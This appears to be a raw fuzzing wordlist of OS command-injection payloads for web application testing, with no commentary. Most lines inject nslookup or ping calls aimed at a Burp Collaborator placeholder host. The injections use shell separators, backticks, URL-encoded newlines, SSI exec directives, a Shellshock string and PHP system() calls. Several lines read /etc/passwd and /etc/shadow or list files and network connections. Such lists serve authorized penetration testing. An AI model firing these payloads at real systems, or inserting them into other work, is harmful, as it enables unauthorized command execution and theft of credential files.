&lt;!--#exec%20cmd=&quot;/bin/nslookup%20<BURP_COLLAB>&quot;--&gt;
&lt;!--#exec%20cmd=&quot;/bin/nslookup%20<BURP_COLLAB>&quot;--&gt;
&lt;!--#exec%20cmd=&quot;/usr/bin/nslookup%20<BURP_COLLAB>;--&gt;
&lt;!--#exec%20cmd=&quot;/usr/bin/nslookup%20<BURP_COLLAB>;--&gt;
/index.html|nslookup <BURP_COLLAB>|
;nslookup <BURP_COLLAB>;
;nslookup <BURP_COLLAB>
;netstat -a;
;system('nslookup%20<BURP_COLLAB>')
;nslookup <BURP_COLLAB>;
|nslookup <BURP_COLLAB>
|/usr/bin/nslookup <BURP_COLLAB>
|nslookup <BURP_COLLAB>|
|/usr/bin/nslookup <BURP_COLLAB>|
||/usr/bin/nslookup <BURP_COLLAB>|
|nslookup <BURP_COLLAB>;
||/usr/bin/nslookup <BURP_COLLAB>;
;nslookup <BURP_COLLAB>|
;|/usr/bin/nslookup <BURP_COLLAB>|
\n/bin/ls -al\n
\n/usr/bin/nslookup <BURP_COLLAB>\n
\nnslookup <BURP_COLLAB>\n
\n/usr/bin/nslookup <BURP_COLLAB>;
\nnslookup <BURP_COLLAB>;
\n/usr/bin/nslookup <BURP_COLLAB>|
\nnslookup <BURP_COLLAB>|
;/usr/bin/nslookup <BURP_COLLAB>\n
;nslookup <BURP_COLLAB>\n
|usr/bin/nslookup <BURP_COLLAB>\n
|nnslookup <BURP_COLLAB>\n
`nslookup <BURP_COLLAB>`
`/usr/bin/nslookup <BURP_COLLAB>`
a);nslookup <BURP_COLLAB>
a;nslookup <BURP_COLLAB>
a);nslookup <BURP_COLLAB>;
a;nslookup <BURP_COLLAB>;
a);nslookup <BURP_COLLAB>|
a;nslookup <BURP_COLLAB>|
a)|nslookup <BURP_COLLAB>
a|nslookup <BURP_COLLAB>
a)|nslookup <BURP_COLLAB>;
a|nslookup <BURP_COLLAB>
|/bin/ls -al
a);/usr/bin/nslookup <BURP_COLLAB>
a;/usr/bin/nslookup <BURP_COLLAB>
a);/usr/bin/nslookup <BURP_COLLAB>;
a;/usr/bin/nslookup <BURP_COLLAB>;
a);/usr/bin/nslookup <BURP_COLLAB>|
a;/usr/bin/nslookup <BURP_COLLAB>|
a)|/usr/bin/nslookup <BURP_COLLAB>
a|/usr/bin/nslookup <BURP_COLLAB>
a)|/usr/bin/nslookup <BURP_COLLAB>;
a|/usr/bin/nslookup <BURP_COLLAB>
;system('nslookup <BURP_COLLAB>')
;system('nslookup <BURP_COLLAB>')
;system('/usr/bin/nslookup <BURP_COLLAB>')
%0Acat%20/etc/passwd
%0A/usr/bin/nslookup <BURP_COLLAB>
%0Anslookup <BURP_COLLAB>
%0A/usr/bin/nslookup <BURP_COLLAB>%0A
%0Anslookup <BURP_COLLAB>%0A
& ping -i 30 <BURP_COLLAB> &
& ping -n 30 <BURP_COLLAB> &
%0a ping -i 30 <BURP_COLLAB> %0a
`ping <BURP_COLLAB>`
| nslookup <BURP_COLLAB>
& nslookup <BURP_COLLAB>
; nslookup <BURP_COLLAB>
%0a nslookup <BURP_COLLAB> %0a
`nslookup <BURP_COLLAB>`
$;/usr/bin/nslookup <BURP_COLLAB>
() { :;}; /bin/bash -c "nslookup <BURP_COLLAB>"
nslookup <BURP_COLLAB>
$(`nslookup <BURP_COLLAB>`)
nslookup <BURP_COLLAB>
%0Anslookup%20<BURP_COLLAB>
{{ get_user_file("/etc/passwd") }}
<!--#exec cmd="/bin/cat /etc/passwd"-->
<!--#exec cmd="/bin/cat /etc/shadow"-->
<!--#exec cmd="/usr/bin/nslookup <BURP_COLLAB>;-->
system('nslookup <BURP_COLLAB>');
<?php system("nslookup <BURP_COLLAB>");?>
